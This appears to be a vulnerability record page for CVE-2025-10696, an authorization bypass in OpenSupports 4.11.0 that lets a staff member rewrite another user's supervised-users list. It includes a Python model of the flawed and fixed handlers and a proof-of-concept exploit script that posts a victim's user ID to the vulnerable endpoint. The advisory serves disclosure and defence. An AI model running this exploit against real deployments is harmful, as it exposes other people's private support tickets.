Security Vulnerability Report
CVE-2025-10696 CVSS 5.4 MEDIUM
Published: 2025-10-03 21:15:34
Last Modified: 2025-12-22 13:19:28

Description

OpenSupports exposes an endpoint that allows the list of 'supervised users' for any account to be edited, but it does not validate whether the actor is the owner of that list. A Level 1 staff member can modify the supervision relationship of a third party (the target user), who can then view the tickets of the added 'supervised' users. This breaks the authorization model and leaks the content of other users' tickets. This issue affects OpenSupports: 4.11.0.
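To make the missing check concrete, here is an added example (not OpenSupports code): a minimal Python model of the supervised-users edit endpoint, with the vulnerable handler that trusts the request's userId beside a fixed handler that requires the actor to own the list. All users, ids and the `attempt` helper are constructed for the example.

```python
# Added example, not OpenSupports code: models the authorization defect behind
# CVE-2025-10696. Names (User, USERS, Forbidden, attempt) are hypothetical.
from dataclasses import dataclass, field


@dataclass
class User:
    id: int
    supervised: set = field(default_factory=set)


# Constructed sample state: 1 is the acting staff member, 2 the target user,
# 5 the user whose tickets would become visible to the target.
USERS = {1: User(1), 2: User(2), 5: User(5)}


class Forbidden(Exception):
    """Raised when the actor is not allowed to edit the requested list."""


def edit_supervised_vulnerable(actor_id, user_id, supervised_ids):
    """Vulnerable handler: writes whatever userId the request names and
    never compares it with the authenticated actor (the CVE's defect)."""
    USERS[user_id].supervised = set(supervised_ids)
    return USERS[user_id].supervised


def edit_supervised_fixed(actor_id, user_id, supervised_ids):
    """Fixed handler: only the owner of a supervised-users list may edit it.
    Any admin exemption is a policy choice outside this example."""
    if actor_id != user_id:
        raise Forbidden(f"actor {actor_id} is not the owner of list {user_id}")
    unknown = [u for u in supervised_ids if u not in USERS]
    if unknown:
        raise ValueError(f"unknown user ids: {unknown}")
    USERS[user_id].supervised = set(supervised_ids)
    return USERS[user_id].supervised


def can_view_ticket(viewer_id, ticket_owner_id):
    """Ticket visibility rule: own tickets, or tickets of supervised users."""
    return viewer_id == ticket_owner_id or ticket_owner_id in USERS[viewer_id].supervised


def attempt(handler, actor_id, user_id, supervised_ids):
    """Run a handler and report the outcome the way an access log would."""
    try:
        handler(actor_id, user_id, supervised_ids)
        return "200 modified"
    except Forbidden:
        return "403 forbidden"
```

The fixed handler's comparison of the authenticated actor against the list owner is the single check whose absence lets a third party widen another user's ticket visibility.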

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:* (OpenSupports 4.11.0) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10696 - OpenSupports Supervised Users Authorization Bypass PoC
# Vulnerability: IDOR / Broken Access Control in supervised users list editing endpoint
# Affected: OpenSupports 4.11.0
# Attacker requirement: Level 1 staff account
import requests

BASE_URL = "http://target-opensupports-instance.com"
SESSION = requests.Session()

# Step 1: Authenticate as a Level 1 staff member
login_payload = {
    "email": "[email protected]",
    "password": "attacker_password"
}
SESSION.post(f"{BASE_URL}/api/login", json=login_payload)

# Step 2: Exploit the IDOR vulnerability
# Modify the supervised users list of a TARGET user (not the attacker's own account)
# The endpoint does not verify that the actor owns the supervised-users list being modified
target_user_id = 2      # ID of the victim user whose supervised list will be modified
supervised_user_id = 5  # ID of the user whose tickets the victim should now see

poc_payload = {
    "userId": target_user_id,                 # Victim's user ID (no ownership check performed)
    "supervisedUsers": [supervised_user_id]   # User to add as supervised
}

# The vulnerable endpoint accepts this request without verifying ownership
response = SESSION.post(
    f"{BASE_URL}/api/edit-supervised-users",
    json=poc_payload
)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Step 3: After successful modification, the victim (target_user_id) will be able
# to view tickets belonging to supervised_user_id, breaking the authorization model
# and exposing other users' ticket content.
```

References

- https://fluidattacks.com/advisories/stratovarius (Exploit, Vendor Advisory)
- https://github.com/opensupports/opensupports (Product)

Additional Record Details

Weakness: CWE-863 (Incorrect Authorization)
NVD status: Undergoing Analysis
Secondary CVSS 4.0 metric: 7.1 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N